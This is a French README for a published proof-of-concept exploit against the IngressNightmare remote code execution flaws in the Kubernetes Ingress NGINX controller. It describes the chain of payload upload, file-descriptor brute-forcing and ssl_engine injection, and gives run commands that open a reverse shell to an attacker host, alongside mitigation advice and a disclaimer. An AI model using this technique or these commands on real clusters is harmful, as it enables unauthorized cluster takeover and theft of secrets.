
Ceci est un code PoC pour exploiter les vulnérabilités IngressNightmare (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 et CVE-2025-1974).
Ce projet fournit un exploit ciblant des vulnérabilités critiques d'exécution de code à distance non authentifiée (RCE) dans le contrôleur Ingress NGINX pour Kubernetes, collectivement appelées IngressNightmare. (Recherche par Wiz)
Dans la recherche originale, l'équipe Wiz n'a pas fourni de PoC ou d'exploit fonctionnel, nous avons donc décidé de créer le nôtre et de le partager avec la communauté.
Le contrôleur Ingress NGINX est un composant largement utilisé dans les environnements Kubernetes, gérant l'accès externe aux services au sein des clusters. Des vulnérabilités récentes (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) découvertes dans son contrôleur d'admission peuvent conduire à un accès non autorisé à tous les secrets à travers les espaces de noms et potentiellement permettre une prise de contrôle complète du cluster.
https://github.com/user-attachments/assets/9e893abf-5c01-4fcb-ad79-7115b429281f
L'exploit suit ces étapes principales :
Générer l'objet partagé (utilisé par la propriété ssl_engine injectée) :
Compile une bibliothèque .so (evil_engine.so) contenant la charge utile de reverse shell.
Téléverser l'objet partagé :
Envoie l'objet partagé compilé au pod ingress, en exploitant le traitement des requêtes (tampons du corps client). L'astuce ici est d'envoyer un Content-Length différent au serveur pour maintenir la connexion ouverte et conserver le descripteur de fichier pour le fichier ouvert.
Forcer brutalement fd : Itère sur les identifiants de processus et les descripteurs de fichiers (/proc/{pid}/fd/{fd}) pour identifier le descripteur correct référençant l'objet téléversé.
Utilisation
Prérequis : Python 3.x Compilateur GCC Module Python requests
Exécuter l'exploit :
pip3 install -r requirements.txt
python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/hakaioffsec/ingressnightmare-poc/blob/HEAD/attacker_host:port)
Ex: python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443
Parfois, le webhook d'admission se trouve dans un espace de noms différent. Dans ce cas, vous devez spécifier l'espace de noms à la fin, comme kube-system, default ou ingress-nginx.
<ingress_url> : URL Ingress cible (publique)
<admission_webhook_url> : URL du webhook d'admission (webhook interne)
attacker_host:port : Votre hôte et port pour le reverse shell
Mettez à jour immédiatement : Mettez à niveau le contrôleur Ingress NGINX vers les versions patchées (1.12.1 ou 1.11.5).
Restreignez le webhook d'admission : Limitez l'accès au webhook uniquement au serveur API Kubernetes.
Désactivation temporaire : Envisagez de désactiver temporairement le composant du contrôleur d'admission si la mise à niveau n'est pas immédiatement possible.
QuimeraX Intelligence est une plateforme avancée de gestion des surfaces d'attaque externes (EASM) et de cyber-renseignement (Cyber Threat Intelligence) spécialisée dans l'identification des vulnérabilités critiques dans les systèmes complexes. La plateforme surveille, détecte et alerte proactivement les clients sur les menaces de sécurité, assurant transparence et réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont jugés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus
Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée envers l'excellence technique. Nous proposons des solutions de sécurité sur mesure, comprenant des tests de pénétration avancés, des simulations réalistes d'équipe rouge (Red Team) et des pratiques de développement sécurisé pour protéger proactivement les actifs de nos clients contre les menaces cybernétiques en évolution. en savoir plus
Avertissement
Cet exploit est fourni strictement à des fins éducatives et de recherche. L'utilisation non autorisée de cet outil contre des cibles sans permission explicite. Hakai Security et QuimeraX déclinent toute responsabilité en cas d'usage abusif ou de dommages causés par l'utilisation de cet exploit.